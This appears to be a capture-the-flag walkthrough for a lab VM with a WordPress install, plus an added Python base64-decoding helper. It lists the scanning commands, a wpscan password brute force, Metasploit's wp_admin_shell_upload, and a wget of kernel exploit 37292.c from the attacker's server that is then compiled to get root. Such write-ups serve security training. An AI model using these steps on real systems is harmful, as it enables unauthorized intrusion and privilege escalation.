We scan the box with nmap -A -T4 -p- 192.168.1.8 -vv

We use dirb http://192.168.1.8 /usr/share/dirb/wordlists/big.txt

When viewing the source on the path http://192.168.1.8/index2 we get this:

THpFd01UQXhNREU9IHRyeSBoYXJk
Decoding it as base64 gives LzEwMTAxMDE= try hard, and decoding LzEwMTAxMDE= again gives /1010101, a new path. Viewing it shows that it is a WordPress path.
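
The two decoding passes above, as an added example that is not part of the original walkthrough: a small Python helper that peels base64 layers out of text and stops once nothing decodes to readable ASCII. The function names are made up for illustration; the sample token is the one quoted above.

```python
import base64
import binascii
import re

# Runs of base64-alphabet characters with optional padding. Short runs are
# ignored because ordinary words would match too often.
TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{8,}={0,2}")

# Token quoted in the walkthrough above.
SAMPLE = "THpFd01UQXhNREU9IHRyeSBoYXJk"


def try_decode(token):
    """Return the decoded text if token is strict base64 of printable ASCII, else None."""
    if len(token) % 4:
        return None
    try:
        text = base64.b64decode(token, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def peel(text, max_depth=5):
    """Decode embedded base64 tokens layer by layer and return every layer seen."""
    layers = [text]
    for _ in range(max_depth):
        # Replace each token that decodes cleanly; leave everything else untouched.
        nxt = TOKEN_RE.sub(lambda m: try_decode(m.group(0)) or m.group(0), layers[-1])
        if nxt == layers[-1]:
            break  # nothing left that decodes to readable text
        layers.append(nxt)
    return layers


if __name__ == "__main__":
    for depth, layer in enumerate(peel(SAMPLE)):
        print(depth, layer)
```

The final value /1010101 also consists only of base64-alphabet characters, but it decodes to non-ASCII bytes, so the printable check is what stops the loop at the real path.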

Running wpscan to enumerate the usernames found the username admin, so we can try to brute force it:
wpscan --url http://192.168.1.8/1010101/wordpress -U admin -P /root/pass/rockyou.txt -v

We got the password Password@123, but when trying to log in we get redirected to http://127.0.0.1/1010101/wordpress/wp-login.php, so we are going to try Metasploit:
use exploit/unix/webapp/wp_admin_shell_upload
set TARGETURI /1010101/wordpress
set rhosts 192.168.1.8
set password Password@123
set username admin

A simple cat /etc/issue gave us Ubuntu 12.04.5 LTS, and using searchsploit we get:

Exploit 37292.c
Then we transfer the exploit to the target machine using python -m SimpleHTTPServer 80, and on the target machine in the /tmp folder we do wget http://192.168.1.11/37292.c
We compile it using gcc -o script 37292.c and then run it with ./script, and we get root. That's it; there is no flag to capture.
